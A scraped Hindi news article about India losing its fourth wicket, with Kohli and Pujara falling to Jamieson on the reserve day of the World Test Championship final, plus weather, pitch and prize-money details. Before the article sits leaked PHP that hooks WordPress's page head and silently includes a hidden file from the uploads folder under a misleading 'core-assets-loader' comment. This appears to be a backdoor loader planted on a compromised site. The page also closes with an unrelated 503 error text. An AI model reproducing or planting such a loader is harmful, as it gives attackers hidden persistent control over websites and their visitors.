add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 72 रन पर टीम इंडिया ने चौथा विकेट गंवाया, कोहली के बाद पुजारा भी पवेलियन लौटे, जेमिसन ने दोनों विकेट लिए – SOCH INDIA
Menu

खेल
72 रन पर टीम इंडिया ने चौथा विकेट गंवाया, कोहली के बाद पुजारा भी पवेलियन लौटे, जेमिसन ने दोनों विकेट लिए

nobanner

भारत और न्यूजीलैंड के बीच साउथैम्पटन में खेले जा रहे वर्ल्ड टेस्ट चैंपियनशिप का फाइनल रिजर्व डे में खेला जा रहा है। आज 98 ओवर का खेल होना है। टीम इंडिया ने 4 विकेट गंवाकर 70+ रन बना लिए हैं। फिलहाल, अजिंक्य रहाणे और ऋषभ पंत क्रीज पर हैं।  

रिजर्व डे में भारत ने दूसरी पारी में 2 विकेट पर 64 रन से आगे खेलना शुरू किया। टीम इंडिया 7 रन ही जोड़ सकी थी कि तीसरा विकेट भी गिर गया। काइल जेमिसन ने मैच में दूसरी बार विराट कोहली को शिकार बनाया। कोहली 13 रन बनाकर विकेटकीपर बीजे वाटलिंग के हाथों कैच आउट हुए।

जेमिसन ने ही 72 के स्कोर पर भारत को चौथा झटका दिया। उन्होंने चेतेश्वर पुजारा को 15 रन पर विकेटकीपर के हाथों कैच आउट कराया।

आज होगा 98 ओवर का खेल

ICC ने बताया है कि आखिरी दिन मौसम ने साथ दिया तो 98 ओवर का खेल जरूर होगा। मैच का आखिरी घंटा तब तक शुरू नहीं होगा जब तक 83 ओवर का खेल नहीं हो जाता। भले ही इसके लिए मैच को स्टंप्स के निर्धारित समय से आगे क्यों न खींचना पड़े। यदि मैच टाई या ड्रॉ रहा तो भारत और न्यूजीलैंड को संयुक्त विजेता घोषित किया जाएगा।

एक्यूवेदर के मुताबिक, बुधवार को आसमान में बहुत कम बादल रहने का अनुमान है। ऐसे में साउथैम्पटन में धूप अच्छी निकलेगी। बारिश की आशंका भी सिर्फ 4% ही है। तापमान अधिकतम 20 डिग्री और न्यूनतम 10 डिग्री रहने की संभावना है। ऐसे में उम्मीद की जा रही है कि फैंस को रिजर्व डे में पूरे 98 ओवर का खेल देखने को मिल सकता है।

पिच रिपोर्ट
पिच क्यूरेटर सिमोन ली ने मैच से पहले कहा था कि मुकाबले के आखिरी दिनों में पिच से स्पिनर्स को मदद मिलने की संभावना ज्यादा रहेगी। टेस्ट के पहले 2-3 दिन तेज गेंदबाजों को स्विंग और सीम के साथ अच्छा उछाल मिला। हालांकि पिच पर अब असमान उछाल देखने को मिल सकता है। साथ ही लैटरल मूवमेंट बरकरार है। ऐसे में भारतीय टीम के सामने मैच बचाना पहली चुनौती होगी। यदि भारतीय टीम बड़ा स्कोर बनाती है, तो फिर वह मैच जीतने के बारे में सोच सकती है। ऐसे में स्पिनर्स की भूमिका काफी अहम हो जाएगी।

WTC फाइनल में 5 दिन का खेल

मैच में बारिश के कारण पहला और चौथा दिन पूरी तरह धुल गया था। दूसरे दिन टॉस हुआ था, जिसे हारकर भारतीय टीम ने पहले बल्लेबाजी करते हुए 217 रन बनाए। अजिंक्य रहाणे ने 49 और विराट कोहली ने 44 रन की पारी खेली। कीवी फॉस्ट बॉलिंग ऑलराउंडर काइल जेमिसन ने 5 विकेट झटके।
जवाब में न्यूजीलैंड 5वें दिन पहली पारी में 249 रन ही बना सकी। टीम के ओपनर डेवॉन कॉनवे ने 54 और कप्तान केन विलियम्सन ने 49 रन की पारी खेली। कॉनवे के करियर का यह दूसरा अर्धशतक है। वहीं, तेज गेंदबाज मोहम्मद शमी ने 4 और ईशांत शर्मा ने 3 विकेट झटके।
शमी ने 4 बड़े खिलाड़ियों रॉस टेलर, बीजे वाटलिंग, कॉलिन डि ग्रैंडहोम और काइल जेमिसन को शिकार बनाया। जबकि ईशांत ने 3 खिलाड़ियों कप्तान केन विलियम्सन, डेवॉन कॉनवे और हेनरी निकोल्स को शिकार बनाया। अश्विन ने टॉम लाथम और नील वैगनर को पवेलियन भेजा। रवींद्र जडेजा सिर्फ टिम साउदी शिकार बना सके।
दूसरी पारी में टीम इंडिया की शुरुआत बेहद खराब रही। टीम ने 24 रन पर ही शुभमन गिल के रूप में पहला विकेट गंवा दिया था। तेज गेंदबाज टिम साउदी ने गिल को 8 रन पर LBW किया। 51 के स्कोर पर भारत को दूसरा झटका भी साउदी ने ही दिया। उन्होंने रोहित को 30 रन पर LBW किया।

विजेता को इनाम
चैंपियन बनने वाली टीम को 16 लाख डॉलर (करीब 11.71 करोड़ रुपए) की इनामी राशि मिलेगी। वहीं, फाइनल में हारने वाली टीम को 8 लाख डॉलर (करीब 5.85 करोड़ रुपए) दिए जाएंगे। चैंपियन टीम को इनामी राशि के साथ-साथ टेस्ट चैंपियनशिप गदा भी मिलेगी। अगर मैच ड्रॉ रहता है या बारिश के कारण खेल संभव नहीं हो पाता है तो दोनों संयुक्त विजेता टीमों को 12-12 लाख डॉलर (8.78-8.78 करोड़ रुपए) दिए जाएंगे।

ऑस्ट्रेलिया को मिलेंगे 3.29 करोड़ रुपए
ICC ने कहा कि टेस्ट चैंपियनशिप रेस में तीसरे स्थान पर रहने वाली ऑस्ट्रेलिया की टीम को 4.5 लाख डॉलर (करीब 3.29 करोड़ रुपए) दिए जाएंगे। चौथे स्थान पर रहने वाले इंग्लैंड को 3.5 लाख डॉलर (करीब 2.56 करोड़ रुपए) और पांचवें स्थान पर रहने वाले पाकिस्तान को 2 लाख डॉलर (करीब 1.46 करोड़ रुपए) दिए जाएंगे। टेस्ट चैंपियनशिप का हिस्सा रहीं अन्य टीमों वेस्टइंडीज, साउथ अफ्रीका और श्रीलंका को 1-1 लाख डॉलर (करीब 73 लाख रुपए) दिए जाएंगे।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.